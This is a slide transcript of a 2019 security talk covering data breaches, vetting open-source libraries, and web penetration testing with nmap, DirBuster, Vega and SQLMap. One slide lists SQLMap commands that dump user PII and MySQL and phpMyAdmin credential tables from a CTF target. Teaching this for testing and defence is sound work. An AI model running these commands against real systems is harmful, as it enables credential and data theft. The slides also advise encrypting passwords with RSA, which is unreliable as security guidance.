SlideShare a Scribd company logo

Demystify Information Security & Threats for Data-Driven Platforms With Chetan Khatri

Chetan Khatri
Chetan Khatri

The document discusses information security for data-driven platforms and open source projects. It motivates the importance of security through examples of data breaches. It covers topics like encryption, authentication, vulnerabilities in open source code, and how to evaluate open source libraries for security issues. The document demonstrates penetration testing tools like Vega and SQLMap to find vulnerabilities like SQL injection in web applications.

1 of 72
Download to read offline
Demystify Information Security & Threats for Data-Driven Platforms Chetan Khatri Solution Architect - Data & ML. Accionlabs Inc. 18th Oct, 2019
Who Am I? Professional Career: ● 2016 - Present. - Technical Lead / Solution Architect - Data & ML. ● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice. ● 2014 - 2016 - Developer - Data Platforms. ● 2012 - 2014 - Consultant - Product developments. University: Master of Computer Science. Data Warehousing, Data Mining, Information Security / Cryptography, Reverse Engineering, Information Retrieval.
Agenda ● Motivation ● Information Security - Ethics. ● Encryption ● Authentication ● Information Security & Potential threats with Open Source World. ● Find vulnerabilities. ● Checklist before using any Open Source library. ● Vulnerabilities report. ● Penetration Testing for Data Driven Developments.
Information Security - Motivation Why Information Security is important?
Information Security - Motivation Source: https://www.huffingtonpost.in/2018/07/06/hackers-have-ac cessed-email-ids-phone-numbers-of-over-5-million-yatra-u sers_a_23475885/
Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
Information Security - Motivation Source: https://economictimes.indiatimes.com/smal l-biz/security-tech/security/zomato-hacked- security-breach-results-in-17-million-user-d ata-stolen/articleshow/58729251.cms
Information Security - Motivation Source: https://www.forbes.com/sites/zakdoffman/2 019/07/09/warning-as-millions-of-zoom-us ers-risk-webcam-hijack-change-your-settin gs-now/#281cb40642d9
Information Security - Motivation
Information Security - Motivation
Information Security - Motivation
Source: https://www.zdnet.com/article/another-data-leak-hits-indi a-aadhaar-biometric-database/
Information Security - Ethics. ● Information Storage - What, Which form, Access to whom? ● Information Usage - Where, How, Which form? ● Responsibility - Ownership, usage? ● Confidentiality ● Authentication ● Governance - Regulators, Guidelines, Damage? ● Freedom vs Force ● Damage to the Society. ● Impact on humanity. ● Data Breach and Cost.
Freedom vs Force
Freedom vs Force Source: https://en.wikipedia.org/wiki/Facebook%E2%80%93Cambridge_Analytica_data_scandal
Freedom vs Force Source: https://www.cnbc.com/2018/04/10/facebook-cambridge-anal ytica-a-timeline-of-the-data-hijacking-scandal.html Source: https://www.engadget.com/2019/07/24/facebook-will-pay-5-b illion-fine-for-cambridge-analytica-data-b/
Data Monetization against ethics Source: https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns- about-cambridge-analytica-in-september-2015-per-court-filing/ Source: https://www.theguardian.com/news/2018/mar/17/cambridge-analyti ca-facebook-influence-us-election
Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Source: https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack -password/
Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Never ever store password of the application in Plain-text. Encrypt it. Use Asymmetric Key Encryption If RSA, use ssh-keygen -t rsa -b 4096
Authentication Open IP Open Ports Default Username and Password for Database, Services etc. Chmod 777 for all directories, files ! Lol ;p
Information Security & Potential threats with Open Source World.
Information Security & Potential threats with Open Source World. How many of you use Open Source ?
Security for Open Source world How well do you know what is inside your project?
Security for Open Source world Known Good Development practices. Community Supported Open Source Code. v/s Random Code found on the Internet.
Vulnerability in Open Source Source: https://synopsys.com/content/dam/synopsys/sig-assets/repo rts/2018-ossra.pdf
How Do I Choose GOOD Open Source
How do I choose SECURE open source packages?
How do I choose SECURE open source packages? Have a look First look
Key questions for a first look? ● Read the README.md or any other readily accessible introductory information? ● Does code seem to be held with good software development standards? ● Does this code develop for professional purposes or hobby projects? ● Any signs for known issues in the code? ● Does this code only solve one use case or is it robust enough for other use cases? ● Is this code active or an archive, “abandoned”? Look for warning signs...
Warning Signs
Even an author says - to use something else! Source: https://code.google.com/archive/p/c rypto-js/
Build by an unauthorized person Source: https://metacpan.org/release/Tivoli- AccessManager-Admin
I did not write this code, but I like it. Source: https://github.com/kbranigan/cJSON
Not maintained anymore … Archived! Source: https://code.google.com/archive/p/crypto-js/
Dumbest library - An author! Source: https://github.com/kbranigan/cJSON/commit/730 209a718cc9bada631cea136d13017752720f5
It is slower and more subjective to side-channel attacks by nature. Source: http://www.literatecode.com/aes256
What to watch before using any package/library?
Key Questions for each Open Source Library Do only 1-2 Collaborators exist? Chances are more to have unreviewed, harmful code. Code merged to master branch is been reviewed with PR? How many issues are OPEN? Validate that OPEN issues are being addressed? Is that code maintained or abandon? Are issues getting fixed and released promptly?
Key Questions for each Open Source Library Check recently active committers and commit? To understand how old is the project. Check how they handle vulnerabilities and security. How you can report security vulnerabilities? Check open security bugs/issues? Good example: Apache Community. https://www.apache.org/security/
Reporting A Vulnerability
Vulnerability Handling
No known vulnerabilities doesn’t mean SECURITY! 1101 new vulnerabilities reported only in Oct, 2019. Source: https://nvd.nist.gov/vuln/full-l isting/2019/10
Vulnerabilities report we are going far worse! Source: https://www.cvedetails.com/brows e-by-date.php
Penetration Testing {Network, Database}
Check number of OPEN services and ports sudo nmap -p- -sS -A IP-Address
Server Files / Directories Scan on permission and Access java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337 httrack website copier
Subgraph Vega ● Vega is a free and open source web security scanner and web security testing platform to test the security of web applications. ● SQL Injection ● XSS ● Inadvertently disclosed sensitive information ● Reflected cross-site scripting ● Stored cross-site scripting ● Blind SQL injection ● Remote file include ● Shell injection ● TLS / SSL security settings
Setup Proxy for Vega Tool
Setup Proxy for Vega Tool
Vega - Start the proxy!
Vega - Start scanning Web application
Vega - Start scanning Web application
Security Scanning alert summary
Security Scanning alert summary
Web Application - Tracing web request payload at Proxy
Web Application - Tracing web request payload at Proxy
Web Application - Intercepting the response callback at Proxy
SqlMap - A penetration testing tool for exploiting SQL injection flaws and a lot! ● Database fingerprinting. ● Full Support for SQL Injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. ● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack. ● dump database tables entirely. ● Out of Box Search support for Database names, Table names, Column names and values. ● Support to execute arbitrary commands and retrieve their standard output. ● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server.
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
SQLMap - Commands python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables user_profile python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email, Mobile, Name --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a 8709f33ac5
Questions?
Hope you had a fun!
Thank you! Chetan Khatri, chetan.khatri@live.com @khatri_chetan - https://twitter.com/khatri_chetan https://github.com/chetkhatri
Ad

Recommended

Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Chetan Khatri
 
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
Agile Testing Alliance
 
What you need to know about OSINT
What you need to know about OSINTWhat you need to know about OSINT
What you need to know about OSINT
Jerod Brennen
 
National seminar on emergence of internet of things (io t) trends and challe...
National seminar on emergence of internet of things (io t) trends and challe...National seminar on emergence of internet of things (io t) trends and challe...
National seminar on emergence of internet of things (io t) trends and challe...
Ajay Ohri
 
OSINT using Twitter & Python
OSINT using Twitter & PythonOSINT using Twitter & Python
OSINT using Twitter & Python
37point2
 
Kush stats alpha
Kush stats alpha Kush stats alpha
Kush stats alpha
Ajay Ohri
 
AI for security or security for AI - Sergey Gordeychik
AI for security or security for AI - Sergey GordeychikAI for security or security for AI - Sergey Gordeychik
AI for security or security for AI - Sergey Gordeychik
Sergey Gordeychik
 
AI and Security
AI and SecurityAI and Security
AI and Security
Anurag Sahay
 
AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for Thought
NUS-ISS
 
The good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityThe good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurity
Mohammad Khreesha
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
Chandrapal Badshah
 
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
Anton Goncharov
 
The Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisThe Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security Analysis
Anton Goncharov
 
Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!
VINCIT SPRL - STRATEGY
 
Is AI going to provide safety for us?
Is AI going to provide safety for us?Is AI going to provide safety for us?
Is AI going to provide safety for us?
DLabs
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
CODE BLUE
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
Chandrapal Badshah
 
AI and ML in Cybersecurity
AI and ML in CybersecurityAI and ML in Cybersecurity
AI and ML in Cybersecurity
Forcepoint LLC
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017
reconvillage
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!
Nutan Kumar Panda
 
OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019
RedHunt Labs
 
How Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessHow Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help business
Ajay Ohri
 
OSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceOSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligence
Deep Shankar Yadav
 
AI and the Impact on Cybersecurity
AI and the Impact on CybersecurityAI and the Impact on Cybersecurity
AI and the Impact on Cybersecurity
Graham Mann
 
Testing Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTesting Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche Exposed
TechWell
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
SSIMeetup
 
Monitoring, Detecting And Preventing Insider Fraud And Abuse V2
Monitoring, Detecting And Preventing Insider Fraud And Abuse V2Monitoring, Detecting And Preventing Insider Fraud And Abuse V2
Monitoring, Detecting And Preventing Insider Fraud And Abuse V2
Kevin M. Moker, CFE, CISSP, ISSMP, CISM
 
2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards
APIsecure_ Official
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
MarceloCunha571649
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
 
Ad

More Related Content

What's hot (19)

AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for Thought
NUS-ISS
 
The good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityThe good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurity
Mohammad Khreesha
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
Chandrapal Badshah
 
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
Anton Goncharov
 
The Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisThe Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security Analysis
Anton Goncharov
 
Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!
VINCIT SPRL - STRATEGY
 
Is AI going to provide safety for us?
Is AI going to provide safety for us?Is AI going to provide safety for us?
Is AI going to provide safety for us?
DLabs
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
CODE BLUE
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
Chandrapal Badshah
 
AI and ML in Cybersecurity
AI and ML in CybersecurityAI and ML in Cybersecurity
AI and ML in Cybersecurity
Forcepoint LLC
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017
reconvillage
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!
Nutan Kumar Panda
 
OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019
RedHunt Labs
 
How Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessHow Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help business
Ajay Ohri
 
OSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceOSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligence
Deep Shankar Yadav
 
AI and the Impact on Cybersecurity
AI and the Impact on CybersecurityAI and the Impact on Cybersecurity
AI and the Impact on Cybersecurity
Graham Mann
 
Testing Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTesting Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche Exposed
TechWell
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
SSIMeetup
 
Monitoring, Detecting And Preventing Insider Fraud And Abuse V2
Monitoring, Detecting And Preventing Insider Fraud And Abuse V2Monitoring, Detecting And Preventing Insider Fraud And Abuse V2
Monitoring, Detecting And Preventing Insider Fraud And Abuse V2
Kevin M. Moker, CFE, CISSP, ISSMP, CISM
 
AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for Thought
NUS-ISS
 
The good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityThe good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurity
Mohammad Khreesha
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
Chandrapal Badshah
 
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
Anton Goncharov
 
The Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisThe Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security Analysis
Anton Goncharov
 
Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!
VINCIT SPRL - STRATEGY
 
Is AI going to provide safety for us?
Is AI going to provide safety for us?Is AI going to provide safety for us?
Is AI going to provide safety for us?
DLabs
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
CODE BLUE
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
Chandrapal Badshah
 
AI and ML in Cybersecurity
AI and ML in CybersecurityAI and ML in Cybersecurity
AI and ML in Cybersecurity
Forcepoint LLC
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017
reconvillage
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!
Nutan Kumar Panda
 
OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019
RedHunt Labs
 
How Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessHow Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help business
Ajay Ohri
 
OSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceOSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligence
Deep Shankar Yadav
 
AI and the Impact on Cybersecurity
AI and the Impact on CybersecurityAI and the Impact on Cybersecurity
AI and the Impact on Cybersecurity
Graham Mann
 
Testing Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTesting Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche Exposed
TechWell
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
SSIMeetup
 
Monitoring, Detecting And Preventing Insider Fraud And Abuse V2
Monitoring, Detecting And Preventing Insider Fraud And Abuse V2Monitoring, Detecting And Preventing Insider Fraud And Abuse V2
Monitoring, Detecting And Preventing Insider Fraud And Abuse V2
Kevin M. Moker, CFE, CISSP, ISSMP, CISM
 

Similar to Demystify Information Security & Threats for Data-Driven Platforms With Chetan Khatri (20)

2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards
APIsecure_ Official
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
MarceloCunha571649
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
 
Web Security... Level Up
Web Security... Level UpWeb Security... Level Up
Web Security... Level Up
Izzet Mustafaiev
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chance
Dr. Anish Cheriyan (PhD)
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Amine SAIGHI
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal Tricks
ThreatReel Podcast
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101
Narudom Roongsiriwong, CISSP
 
OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and Practitioners
Megan DeBlois
 
Dev{sec}ops
Dev{sec}opsDev{sec}ops
Dev{sec}ops
Steven Carlson
 
Web Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging ThreatsWeb Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging Threats
Alan Kan
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0
Neelu Tripathy
 
Software Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and SecuritySoftware Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and Security
Tao Xie
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
Asep Sopyan
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
fangjiafu
 
PROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITYPROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITY
Sylvain Martinez
 
Security guidelines
Security guidelinesSecurity guidelines
Security guidelines
karthz
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Keith Kraus
 
2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards
APIsecure_ Official
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
MarceloCunha571649
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
 
Web Security... Level Up
Web Security... Level UpWeb Security... Level Up
Web Security... Level Up
Izzet Mustafaiev
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chance
Dr. Anish Cheriyan (PhD)
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Amine SAIGHI
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal Tricks
ThreatReel Podcast
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101
Narudom Roongsiriwong, CISSP
 
OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and Practitioners
Megan DeBlois
 
Dev{sec}ops
